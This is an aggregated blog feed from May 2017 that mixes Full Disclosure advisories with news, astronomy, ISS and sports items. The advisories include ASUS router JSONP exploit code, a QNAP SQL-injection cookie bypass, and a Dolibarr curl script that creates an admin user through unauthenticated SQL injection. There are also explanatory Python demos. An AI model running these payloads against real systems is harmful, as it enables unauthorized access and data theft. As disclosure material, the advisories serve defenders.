DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects, delivering precise results and a low false positive rate.
DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would.
Subscribe for a free software trial on our website http://ift.tt/Vn2J4r
E-mail: defensecode[at]defensecode.com
Website: http://ift.tt/Vn2J4r
Twitter: https://twitter.com/DefenseCode/
Source: Gmail -> IFTTT-> Blogger
[FD] SEC Consult SA-20170511-0 :: Stack-based buffer overflow vulnerability in Guidance Software EnCase Forensic Imager
A blog post with additional information is available here: http://ift.tt/2q5pyQO
We have also released a video showing arbitrary code execution: https://www.youtube.com/watch?v=1EngNIXSNQw

SEC Consult Vulnerability Lab Security Advisory < 20170511-0 >
=======================================================================
title: Stack based buffer overflow
product: Guidance Software EnCase Forensic Imager
vulnerable version: EnCase Forensic Imager <= 7.10
fixed version: -
CVE number: -
impact: critical
homepage: http://ift.tt/1WhUYON
found: 2017-02-17
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
http://ift.tt/1mGHMNR
=======================================================================
Vendor description:
Source: Gmail -> IFTTT-> Blogger
Dutch Police Seize Another Company that Sells PGP-Encrypted Blackberry Phones
The Dutch police arrested four suspects on Tuesday on suspicion of money laundering and involvement in selling custom encrypted BlackBerry and Android smartphones to criminals. The Dutch National High Tech Crime Unit (NHTCU), a dedicated team within the Dutch National Police Agency that investigates advanced forms of cyber crime, carried out an investigation and found that the phone brand "
from The Hacker News http://ift.tt/2q5fLKy
via IFTTT
JuliaLang/julia
Anonymous functions that return anonymous functions error on deserialization. #21793. Open. amitmurthy opened this Issue 7 minutes ago · 0 ...
from Google Alert - anonymous http://ift.tt/2pzNmbH
via IFTTT
The Multiwavelength Crab
The Crab Nebula is cataloged as M1, the first object on Charles Messier's famous list of things which are not comets. In fact, the Crab is now known to be a supernova remnant, expanding debris from a massive star's death explosion, witnessed on planet Earth in 1054 AD. This brave new image offers a 21st century view of the Crab Nebula by presenting image data from across the electromagnetic spectrum as wavelengths of visible light. From space, Chandra (X-ray), XMM-Newton (ultraviolet), Hubble (visible), and Spitzer (infrared) data are in purple, blue, green, and yellow hues. From the ground, Very Large Array radio wavelength data is shown in red. One of the most exotic objects known to modern astronomers, the Crab Pulsar, a neutron star spinning 30 times a second, is the bright spot near picture center. Like a cosmic dynamo, this collapsed remnant of the stellar core powers the Crab's emission across the electromagnetic spectrum. Spanning about 12 light-years, the Crab Nebula is 6,500 light-years away in the constellation Taurus. via NASA http://ift.tt/2r0edjf
Wednesday, May 10, 2017
Anonymous Looking for an Executive Chef
We are a locally-based restaurant group (five locations) looking for a talented and passionate executive chef to helm a busy neighborhood restaurant ...
from Google Alert - anonymous http://ift.tt/2q4usO0
via IFTTT
[FD] Multiple Vulnerabilities in ASUS Routers [CVE-2017-5891 and CVE-2017-5892]
[Original post here: http://ift.tt/2r0Me2G]

Summary
Various models of ASUS RT routers have several CSRF vulnerabilities allowing malicious sites to login and change settings in the router; multiple JSONP vulnerabilities allowing exfiltration of router data; and an XML endpoint revealing WiFi passwords. Most of these issues have been fixed by Asus in the March 2017 firmware update under v3.0.0.4.380.7378. One issue (JSONP information disclosure) remains unfixed since the vendor doesn't consider it to be a security threat. CVE-2017-5891 has been assigned to the CSRF issues, and CVE-2017-5892 to cover the non-CSRF issues.

Vulnerability Details
RT routers from ASUS, like many other routers, come with a built-in web interface accessible over the local network but normally not accessible via the Internet. We discovered multiple issues within that web interface that can facilitate attacks on the router either via a malicious site visited by a user on the same network, or a malicious mobile or desktop application running on the same network. For the CSRF vulnerabilities, a user would need to visit a malicious site which can try to login and change settings. For the JSONP vulnerabilities, a website can load the JSONP endpoints via SCRIPT tags as long as a matching function name is defined on that site. The XML endpoint requires a mobile or desktop application to exploit.

NOTE: all of these assume that the attacker knows the local IP address of the router. This could probably be guessed or be determined via Javascript APIs like WebRTC. For desktop and mobile applications, determination of the gateway address should be trivial to implement.

Issue #1 - Login Page CSRF
The login page for the router doesn't have any kind of CSRF protection, thus allowing a malicious website to submit a login request to the router without the user's knowledge. Obviously, this only works if the site either knows the username and password of the router OR the user hasn't changed the default credentials ("admin / admin"). To exploit, submit the base-64 encoded username and password as a "login_authorization" form post to the "/login.cgi" URL of the browser. Example of a form that can exploit this issue (uses default credentials):
Issue #2 - Save Settings CSRF
The various pages within the interface that can save settings do not have CSRF protection. That means that a malicious site, once logged in as described above, would be able to change any settings in the router without the user's knowledge.
NOTE: We have not been able to exploit this issue consistently.

Issue #3 - JSONP Information Disclosure Without Login
Two JSONP endpoints exist within the router which allow detection of which ASUS router is running and some information disclosure. No login to the router is required. The vendor doesn't consider these endpoints a security threat. The endpoints are as follows:

/findasus.json
Returns the router model name, SSID name and the local IP address of the router:
    iAmAlive([{model?Name: "XXX", ssid: "YYY", ipAddr: "ZZZZ"}])

/httpd_check.json
Returns:
    {"alive": 1, "isdomain": 0}

Exploit code as follows:

    function iAmAlive(payload) {
        window.alert("Result returned: " + JSON.stringify(payload));
    }
    function alert1() {
        var script = document.createElement('script');
        script.src = 'http://ift.tt/2pv9NyO';
        document.getElementsByTagName('head')[0].appendChild(script);
    }
    function alert2() {
        var script = document.createElement('script');
        script.src = 'http://ift.tt/2qRpQeU';
        document.getElementsByTagName('head')[0].appendChild(script);
    }

Issue #4 - JSONP Information Disclosure, Login Required
There exist multiple JSONP endpoints within the router interface that reveal various data from the router. Below is a list of endpoints and exploit code:

/status.asp - Network Information

    function getstatus() {
        var script = document.createElement('script');
        script.src = 'http://ift.tt/1yF9uRq';
        document.getElementsByTagName('head')[0].appendChild(script);
    }
    function show_wanlink_info() {
        var obj = {};
        obj.status = wanlink_status();
        obj.statusstr = wanlink_statusstr();
        obj.wanlink_type = wanlink_type();
        obj.wanlink_ipaddr = wanlink_ipaddr();
        obj.wanlink_xdns = wanlink_xdns();
        window.alert(JSON.stringify(obj));
    }
/wds_aplist_2g.asp - Surrounding Access points, 2.4 GHz band
/wds_aplist_5g.asp - Surrounding Access points, 5 GHz band

    function getwds_2g() {
        var script = document.createElement('script');
        script.src = 'http://ift.tt/2qRj0X9';
        document.getElementsByTagName('head')[0].appendChild(script);
    }
    function getwds_5g() {
        var script = document.createElement('script');
        script.src = 'http://ift.tt/2pvnnSX';
        document.getElementsByTagName('head')[0].appendChild(script);
    }

/update_networkmapd.asp - Network map of devices on the network

    function getmap() {
        var script = document.createElement('script');
        script.src = 'http://ift.tt/2qRifgx';
        document.getElementsByTagName('head')[0].appendChild(script);
    }

/update_clients.asp - Origin data

    function getorigin() {
        originData = [];
        var script = document.createElement('script');
        script.src = 'http://ift.tt/2pvl1mM';
        document.getElementsByTagName('head')[0].appendChild(script);
    }

/get_real_ip.asp - External IP address

    function getrealip() {
        var script = document.createElement('script');
        script.src = 'http://ift.tt/2qRdlA2';
        document.getElementsByTagName('head')[0].appendChild(script);
    }

/get_webdavInfo.asp - WebDAV information

    function getwebdav() {
        var script = document.createElement('script');
        script.src = 'http://ift.tt/2pvjXzz';
        document.getElementsByTagName('head')[0].appendChild(script);
    }
Issue #5 - XML Endpoint Reveals WiFi Passwords
An XML endpoint exists in the router which reveals the WiFi password of the router, but fully exploiting this issue would require a mobile or desktop application running on the local network, since XML cannot be loaded cross-origin in the browser. This endpoint can be accessed at the following URL and requires login:
    [router IP]/WPS_info.xml

Mitigation Steps / Vendor Response
Users should change the default credentials and apply the latest firmware released by ASUS, version v3.0.0.4.380.7378 or higher. There is no mitigation available for issue #3 - JSONP information disclosure without login.

Affected models include the following ASUS routers:
RT-AC55U
RT-AC56R
RT-AC56S
RT-AC56U
RT-AC66U
RT-AC88U
RT-AC66R
RT-AC66U
RT-AC66W
RT-AC68W
RT-AC68P
RT-AC68R
RT-AC68U
RT-AC87R
RT-AC87U
RT-AC51U
RT-AC53U
RT-AC1900P
RT-AC3100
RT-AC3200
RT-AC5300
RT-N11P
RT-N12 (D1 version only)
RT-N12+
RT-N12E
RT-N18U
RT-N56U
RT-N66R
RT-N66U (B1 version only)
RT-N66W

References
CVE-IDs: CVE-2017-5891 and CVE-2017-5892
CERT/CC Tracking # VR-627

Credits
We would like to thank CERT/CC for helping to coordinate the disclosure process. This advisory was written by Yakov Shafranovich.

Timeline
2017-01-21: Initial contact with the vendor
2017-01-23: Initial contact with CERT/CC
2017-02-05: Vulnerability details and POC code provided to the vendor, CVEs requested
2017-02-10: Vulnerability analysis received from the vendor
2017-02-12: Beta firmware provided by the vendor to test fixes
2017-02-12: Vendor fixes confirmed
2017-03-31: Fixed firmware released publicly by the vendor
2017-05-01: Draft advisory shared with the vendor and CERT/CC
2017-05-09: Public disclosure
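The mitigation section above gives a fixed firmware build and a list of affected models. As an added example (not the advisory author's code, nor ASUS's), the script below turns those two facts into an inventory check: it parses ASUS-style firmware strings, handles the two models that are affected in one hardware revision only, and classifies each device. The version layout assumption ("v3.0.0.4.380.7378", dot-separated numeric fields) and the sample inventory are this example's own.

```python
"""Inventory check for the ASUS RT advisory (added example, not the advisory's
or ASUS's code). FIXED_VERSION and AFFECTED_MODELS are copied from the
advisory text; the version parser assumes the "v3.0.0.4.380.7378" layout."""

FIXED_VERSION = "3.0.0.4.380.7378"
AFFECTED_MODELS = {
    "RT-AC55U", "RT-AC56R", "RT-AC56S", "RT-AC56U", "RT-AC66U", "RT-AC88U",
    "RT-AC66R", "RT-AC66W", "RT-AC68W", "RT-AC68P", "RT-AC68R", "RT-AC68U",
    "RT-AC87R", "RT-AC87U", "RT-AC51U", "RT-AC53U", "RT-AC1900P", "RT-AC3100",
    "RT-AC3200", "RT-AC5300", "RT-N11P", "RT-N12", "RT-N12+", "RT-N12E",
    "RT-N18U", "RT-N56U", "RT-N66R", "RT-N66U", "RT-N66W",
}
# Models the advisory lists as affected for one hardware revision only.
REVISION_ONLY = {"RT-N12": "D1", "RT-N66U": "B1"}


def parse_version(text):
    """'v3.0.0.4.380.7378' -> (3, 0, 0, 4, 380, 7378); '_' is accepted as '.'."""
    s = text.strip().lower()
    if s.startswith("v"):
        s = s[1:]
    parts = s.replace("_", ".").split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError("unrecognised ASUS firmware version: %r" % (text,))
    return tuple(int(p) for p in parts)


def is_version_fixed(version):
    """True when the firmware is at or above the release that fixed the CVEs."""
    return parse_version(version) >= parse_version(FIXED_VERSION)


def assess(model, version, revision=None):
    """Classify one device as 'not-listed', 'fixed', 'vulnerable' or
    'needs-revision' (the model is affected in one hardware revision only
    and no revision was supplied, so the answer cannot be decided)."""
    if model not in AFFECTED_MODELS:
        return "not-listed"
    if model in REVISION_ONLY:
        if revision is None:
            return "needs-revision"
        if revision != REVISION_ONLY[model]:
            return "not-listed"
    return "fixed" if is_version_fixed(version) else "vulnerable"


def audit(inventory):
    """inventory: iterable of (model, version, revision-or-None).
    Returns a list of (model, version, revision, result). Note that 'fixed'
    still leaves the unauthenticated JSONP endpoints (issue #3) reachable; the
    advisory states no mitigation exists for that one."""
    return [(m, v, r, assess(m, v, r)) for m, v, r in inventory]


# Constructed sample inventory (not real devices; version strings invented).
SAMPLE_INVENTORY = [
    ("RT-AC68U", "v3.0.0.4.380.7266", None),   # pre-fix build
    ("RT-AC88U", "3.0.0.4.380.7378", None),    # exactly the fixed build
    ("RT-N66U", "3.0.0.4.380.7378", None),     # hardware revision unknown
    ("RT-N66U", "3.0.0.4.376.3626", "C1"),     # not the B1 revision
    ("RT-AC86U", "3.0.0.4.382.1000", None),    # model not on the list
]

if __name__ == "__main__":
    for model, version, revision, result in audit(SAMPLE_INVENTORY):
        print("%-10s %-20s %-4s %s" % (model, version, revision or "-", result))
```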
Source: Gmail -> IFTTT-> Blogger
[FD] Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow - SEH Overwrite - Code Execution
# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow - SEH Overwrite - Code Execution
# Date: 16-03-2017
# Software Link: http://ift.tt/2qKVVVU
# Exploit Author: Majid Alqabandi
# Contact: http://ift.tt/2qLfFsp
# CVE: CVE-2017-6953
# Category: Local - command execution - Buffer Overflow - SEH Overwrite.
# Vendor Notified: 17-04-2016

1. Description
SymDiag.exe is vulnerable to a buffer overflow with SEH overwrite. When trying to "Register a new card", the input fields are vulnerable to a stack overflow attack which leads to code execution and other possible security threats.

2. Proof of Concept
The provided PoC code will:
- Exploit the vulnerability.
- Execute shell code.
- Create a backdoor on port 31337.

To exploit, start the SmartDiag.exe tool, choose "Register a new card", and in the ATR field use the following payload (Tested on Win7x64 & Win8x64 - SmartDiag v2.5):
3. Solution:
Vendor has been informed and confirmed the issue; no fix is available yet from the vendor.
Source: Gmail -> IFTTT-> Blogger
[FD] QNAP PhotoStation 5.2.4 and MusicStation 4.8.4 Authentication Bypass
# Exploit QNAP PhotoStation 5.2.4 and MusicStation 4.8.4 Authentication Bypass
# Date: 10.05.2017
# Software Link: https://www.qnap.com
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: http://ift.tt/2iHZPtU
# Category: web

1. Description
`$_COOKIE[STATIONSID]` is not escaped and is then used inside an SQL statement.
http://ift.tt/2qTCUR3

2. Proof of Concept
GET /photo/api/dmc.php HTTP/1.1
Host: qnap.host:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: QMS_SID=' UNION SELECT 9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999 -- a
Connection: close

3. Fix
Upgrade to version: Photo Station (5.3.4 / 5.2.5), Music Station (5.0.4 / 4.8.5)
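The advisory's one-line description (a cookie value spliced unescaped into an SQL statement) is the whole bug. As an added example, not QNAP's code or the advisory author's, the block below reproduces that defect against an in-memory SQLite table and puts the parameterized lookup beside it. The table schema (sid, user_id, is_admin) is constructed for this example; the real Photo Station query and its column count are not on the page, which is why the advisory's payload carries nine columns and the one here carries three.

```python
"""Added example (not QNAP's code): an unescaped session cookie inside an SQL
string versus a bound parameter. Schema and rows are constructed."""
import re
import sqlite3

# Constructed sample data: a single ordinary, non-admin session.
SEED_SESSIONS = [("abc123", 42, 0)]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE sessions (sid TEXT PRIMARY KEY, user_id INTEGER, is_admin INTEGER)"
    )
    db.executemany("INSERT INTO sessions VALUES (?, ?, ?)", SEED_SESSIONS)
    return db


def lookup_session_unsafe(db, cookie_value):
    """Mirrors the advisory's defect: the cookie text becomes part of the SQL."""
    sql = "SELECT user_id, is_admin FROM sessions WHERE sid = '" + cookie_value + "'"
    return db.execute(sql).fetchone()


def lookup_session_safe(db, cookie_value):
    """Hardened form: the cookie travels as a bound parameter, never as SQL."""
    sql = "SELECT user_id, is_admin FROM sessions WHERE sid = ?"
    return db.execute(sql, (cookie_value,)).fetchone()


# Second layer, independent of the query: a session id has a known shape, so
# anything else can be rejected before it reaches the database at all.
SID_SHAPE = re.compile(r"^[A-Za-z0-9]{6,64}$")


def is_well_formed_sid(cookie_value):
    return bool(SID_SHAPE.match(cookie_value))


# Same shape as the advisory's cookie, sized to the three-column table above.
# The trailing "-- a" comments out the closing quote the application appends.
FORGED_COOKIE = "' UNION SELECT 9999999999, 1 -- a"


def demo():
    """Returns what each lookup yields for a real cookie and a forged one."""
    db = make_db()
    return {
        "valid_unsafe": lookup_session_unsafe(db, "abc123"),
        "valid_safe": lookup_session_safe(db, "abc123"),
        # The forged cookie matches no session, yet the UNION row comes back
        # and would be read as user 9999999999 with the admin flag set.
        "forged_unsafe": lookup_session_unsafe(db, FORGED_COOKIE),
        "forged_safe": lookup_session_safe(db, FORGED_COOKIE),
        "forged_well_formed": is_well_formed_sid(FORGED_COOKIE),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```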
Source: Gmail -> IFTTT-> Blogger
[FD] [FOXMOLE SA 2017-02-23] Dolibarr ERP & CRM - Multiple Issues
=== FOXMOLE - Security Advisory 2017-02-23 ===

Dolibarr ERP & CRM - Multiple Issues
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Affected Versions
=================
Dolibarr 4.0.4

Issue Overview
==============
Vulnerability Type: SQL Injection, Cross Site Scripting, Weak Hash Algorithm without Salt, Weak Password Change Method
Technical Risk: critical
Likelihood of Exploitation: medium
Vendor: Dolibarr
Vendor URL: http://ift.tt/1SLkKIl
Credits: FOXMOLE employees Tim Herres and Stefan Pietsch
Advisory URL: http://ift.tt/2qqXfxh
Advisory Status: Public
OVE-ID: OVE-20170223-0001
CVE Number: CVE-2017-7886, CVE-2017-7887, CVE-2017-7888
CVE URL: http://ift.tt/2r1u1SS http://ift.tt/2qqZzUY http://ift.tt/2r1u2pU
CWE-ID: CWE-79, CWE-89, CWE-327, CWE-620, CWE-759
CVSS 2.0: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)

Impact
======
There are SQL injection vulnerabilities exploitable without authentication. An attacker could use the SQL injection to access the database in an unsafe way. This means there is a high impact to all Dolibarr installations. The passwords in the database are stored as MD5 hashes, which means they are easily crackable. The Dolibarr software also lacks input validation, resulting in different reflected XSS vulnerabilities.

Information
===========
We only provide examples for the issues; there are quite a few more. It is really important to check the whole application for further vulnerabilities. We want developers to change the overall security according to security best practices instead of fixing only particular issues.

Issue Description
=================
All items tested using FF52.

1.) SQL Injection in style.css.php (CVE-2017-7886)
Authentication Required: No
PoC: http://ift.tt/2qrjWBL(extractvalue(rand()%2cconcat(concat(0x3a,CURRENT_USER())))%2c1)--%201

PoC creating a new admin user via SQL Injection:
##################################################################################
#!/bin/bash
URL="http://ift.tt/2r1jkj7\
llx_user%20VALUES%20(424242%2C%200%2C%20NULL%2C%20NULL%2C%201%2C%200%2C%20%27\
1984-01-01%2000%3A00%3A00%27%2C%20%271984-01-01%2000%3A00%3A00.000%27%2C%20NULL\
%2C%20NULL%2C%20%27newadmin%27%2C%20NULL%2C%20%2761529519452809720693702583126814\
%27%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20NULL%2C%20%27SuperAdmin%27%2C%20%27%27\
%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20%27\
%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%201%2C%201%2C\
%201%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20%27\
2017-03-10%2000%3A00%3A00%27%2C%20%272017-03-10%2000%3A00%3A00%27%2C%20NULL%2C\
%20%27%27%2C%20NULL%2C%201%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20NULL%2C%200%2C\
%20%27%27%2C%200%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL)%3B--%27"
curl -s ${URL}
##################################################################################
The script creates the user 'NEWADMIN' with password 'ximaz'.

2.) Cross Site Scripting Reflected (CVE-2017-7887)
http://ift.tt/2q747Nm

3.) Passwords stored using MD5 hashes (CVE-2017-7888)
The application stores the passwords using the MD5 hash algorithm without a salt. The MD5 hash is easily crackable.
dolibarr=# SELECT login,pass_crypted FROM llx_user;
 login | pass_crypted
Source: Gmail -> IFTTT-> Blogger
I have a new follower on Twitter
#TweetChat
Engage in #TwitterChat & #TwitterParty conversations. Follow #hashtags & events. #Curate your Twitter stream w/ #FavePages. Powered by https://t.co/dXdkYmXO0e
NYC
https://t.co/4DSs5RW5WO
Following: 14760 - Followers: 28998
May 10, 2017 at 05:45PM via Twitter http://twitter.com/TweetChat
Ravens: Little-used rule likely precludes pursuit of free-agent RB LeGarrette Blount (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
[FD] [CORE-2017-0001] - SAP SAPCAR Heap Based Buffer Overflow Vulnerability
1. *Advisory Information*
Title: SAP SAPCAR Heap Based Buffer Overflow Vulnerability
Advisory ID: CORE-2017-0001
Advisory URL: http://ift.tt/2r2CEfM heap-based-buffer-overflow-vulnerability
Date published: 2017-05-10
Date of last update: 2017-05-10
Vendors contacted: SAP
Release mode: Coordinated release

2. *Vulnerability Information*
Class: Heap-based Buffer Overflow [CWE-122]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2017-8852

3. *Vulnerability Description*
SAP [1] distributes software and packages using an archive program called SAPCAR [2]. This program uses a custom archive file format. A memory corruption vulnerability was found in the parsing of specially crafted archive files that could lead to local code execution scenarios.

4. *Vulnerable Packages*
SAPCAR archive tool version 721.510
Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*
SAP published the following Security Notes:
. 2441560

6. *Credits*
This vulnerability was discovered and researched by Martin Gallo and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*
This vulnerability is caused by a controlled heap buffer overflow when opening a specially crafted CAR archive file. The following python code can be used to generate an archive file that triggers the vulnerability:
/--
Source: Gmail -> IFTTT-> Blogger
An Alternative Anonymous Cryptocurrency Apple Coin Review
An Alternative Anonymous Cryptocurrency Apple Coin Review. AppeCoin, Sergio D. Lerner's proposal for an e-cash scheme, is designed for a ...
from Google Alert - anonymous http://ift.tt/2r0fXbh
via IFTTT
Google Won't Patch A Critical Android Flaw Before ‘Android O’ Release
Millions of Android smartphones are at serious risk from a "screen hijack" vulnerability that allows hackers to steal your passwords and bank details, as well as helping ransomware apps extort money from victims. The worst thing is that Google says it won't be patched until the release of the 'Android O' version, which is scheduled for release in the 3rd quarter this year. And the worse, worse, worse
from The Hacker News http://ift.tt/2r28lGe
via IFTTT
Ravens: RB Taquan "Smoke" Mizzell among 25 players on Mel Kiper Jr.'s list of top undrafted rookies (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
ISS Daily Summary Report – 5/09/2017
OsteoOmics: The crew changed BioCell media in BioCell Habitat 2. The media in the other four habitats will be changed this week. This is the second of four weeks of OsteoOmics operations. Crewmembers experience bone loss in orbit, stemming from the lack of gravity acting on their bones. OsteoOmics investigates the molecular mechanisms that dictate this bone loss by examining osteoblasts, which form bone, and osteoclasts, which dissolve bone. Improved understanding of these mechanisms could lead to more effective countermeasures to prevent bone loss during space missions and in a wide range of disorders on Earth. This may lead to better preventative care or therapeutic treatments for people suffering bone loss as a result of bone diseases like osteopenia and osteoporosis, or for patients on prolonged bed rest. Veg-03: The crew harvested leaves from Chinese Cabbage growing in the Veggie facility and inserted samples into Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI). The remainder of the plants were left to grow. The goal of Veg-03 is to further demonstrate the proof of concept for the Veggie plant growth chamber and planting pillows. Future long-duration missions into the solar system will require a fresh food supply to supplement crew diets, which entails growing crops in space. Previous investigations focused on improving productivity in controlled environments but the limited quarters of the space shuttle and ISS made it difficult to conduct large-scale crop production tests. Veg-03 expands on previous validation tests of the Veggie hardware to grow cabbage, lettuce and other fresh vegetables. Tests determine which types of microorganisms are present in space-grown cabbage, providing baseline data for future crop-growing efforts. Behavioral health surveys assess the impact of growing plants on crew morale and mood. 
Extravehicular Activity (EVA) Preparations: The crew completed the following in preparation for the EXPRESS Pallet Controller Assembly (ExPCA) EVA currently planned for this Friday, May 12:
Prepared the Equipment Lock, Extravehicular Mobility Units (EMUs) and ancillary hardware to support suit donning.
Installed/replaced Metal Oxide (METOX) Lithium Hydroxide (LiOH) canisters and batteries in EMU 3006 and 3008.
Performed EMU pressurized fit verification to ensure proper fit and feel prior to the EVA.
Performed a procedures review covering reminders, emergency briefing and helpful tips.
Following the review, the crew completed a conference with ground teams to address any questions or concerns.

Orbital ATK (OA)-7 Cargo Operations: Yesterday afternoon, the crew continued transferring Cygnus cargo to ISS. Approximately 3 hours of transfer operations remain to be completed. Cygnus is currently scheduled to unberth from ISS on July 16th.

Today's Planned Activities
All activities were completed unless otherwise noted.
Personal Data Prep for Return
Atmospheric Control System (ACS) NORS Oxygen Teardown
Test Video Recording for Russia Today TV Channel
Preparation of Reports for Roscosmos Web Site and Social Media
URAGAN. Observation and photography
EKON-M. Observations and photography
Extravehicular Activity (EVA) Reminder for On-Orbit Fit check Verification (OFV)
SARCOLAB-3 CONSTRAINTS
Acoustic Dosimeter Setup Day 2
OsteoOmics Media Relocate
VEG-03 Science Harvest
OsteoOmics Media Change
VEG-03 MELFI Insertion #1
On-Orbit Hearing Assessment (O-OHA) with EarQ Software Setup and Test
Nanoracks Cubesat Deployer PAO Video
Extravehicular Activity (EVA) Equipment Lock Preparation Part 1
Extravehicular Mobility Unit (EMU) Metal Oxide (METOX) Installation
Extravehicular Mobility Unit (EMU) On-orbit Fit check Verification
Private family conference
CASKAD. Manual Mixing in Bioreactor
Extravehicular Activity (EVA) Procedure Review
Extravehicular Activity (EVA) Procedure Conference
Water Recovery System Waste Water Tank Drain Init
On-Orbit Hearing Assessment (O-OHA) with EarQ Software Setup and Test
Water Recovery System Waste Water Tank Drain Termination
Early Mission Debrief Conference
OsteoOmics MELFI Removal

Completed Task List Items
Veggie 03 Pillow Watering and Photo

Ground Activities
All activities were completed unless otherwise noted.
EVA prep support
SPDM Stow and MT Translation from WS3 to WS4
MSS ExPCA EVA Setup

Three-Day Look Ahead:
Wednesday, 05/10: EVA procedures review, MARES, OsteoOmics media change, OBT ISS emergency simulation
Thursday, 05/11: EVA Equipment Lock prep part 2, EVA procedures conference, EVA tool audit, OsteoOmics
Friday, 05/12: ExPCA EVA #42

QUICK ISS Status – Environmental Control Group:
Component: Status
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System ("SKV1"): Off
[СКВ] 2 – SM Air Conditioner System ("SKV2"): On
Carbon Dioxide Removal Assembly (CDRA) Lab: Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Operate
Major Constituent Analyzer (MCA) Node 3: Operate
Oxygen Generation Assembly (OGA): Process
Urine Processing Assembly (UPA): Process
Trace Contaminant Control System (TCCS) Lab: Full up
Trace Contaminant Control System (TCCS) Node 3: Off
from ISS On-Orbit Status Report http://ift.tt/2r22KQ5
via IFTTT
[FD] SEC Consult SA-20170510-0 :: Insecure Handling Of URI Schemes in Microsoft OneDrive iOS App
A short demo video is available here: https://youtu.be/0jZdM9peVSk

SEC Consult Vulnerability Lab Security Advisory < 20170510-0 >
=======================================================================
title: Insecure Handling Of URI Schemes
product: Microsoft OneDrive iOS App
vulnerable version: 8.13
fixed version: 8.14
impact: Medium
homepage: http://ift.tt/L3en2E
found: 2017-04-10
by: S. Tripathy (Office Singapore)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
http://ift.tt/1mGHMNR
=======================================================================
Vendor description:
Source: Gmail -> IFTTT-> Blogger
Cisco Finally Patches 0-Day Exploit Disclosed In Wikileaks-CIA Leak
Cisco Systems has finally released an update for its IOS and IOS XE software to address a critical vulnerability, disclosed nearly two months back in the CIA Vault 7 leak, that affects more than 300 of its switch models. The company identified the vulnerability in its product while analyzing "Vault 7" dump — thousands of documents and files leaked by Wikileaks, claiming to detail hacking
from The Hacker News http://ift.tt/2pwbnAw
via IFTTT
Microsoft Issues Patches for Another Four Zero-Day Vulnerabilities
As part of this month's Patch Tuesday, Microsoft has released security patches for a total of 55 vulnerabilities across its products, including fixes for four zero-day vulnerabilities being exploited in the wild. Just yesterday, Microsoft released an emergency out-of-band update separately to patch a remote execution bug (CVE-2017-0290) in Microsoft's Antivirus Engine that comes enabled by
from The Hacker News http://ift.tt/2q2KXu6
via IFTTT
Trump Fires FBI Director Over Clinton Probe, Amid Russia Investigation
President Donald Trump has abruptly fired James Comey, the director of the Federal Bureau of Investigation (FBI) who was leading an investigation into alleged links between Trump and Russia. The White House announced on Tuesday that Comey was fired on the "clear recommendation" of Deputy Attorney General Rod Rosenstein and Attorney General Jeff Sessions, citing the reason that he was no longer
from The Hacker News http://ift.tt/2pv0nDv
via IFTTT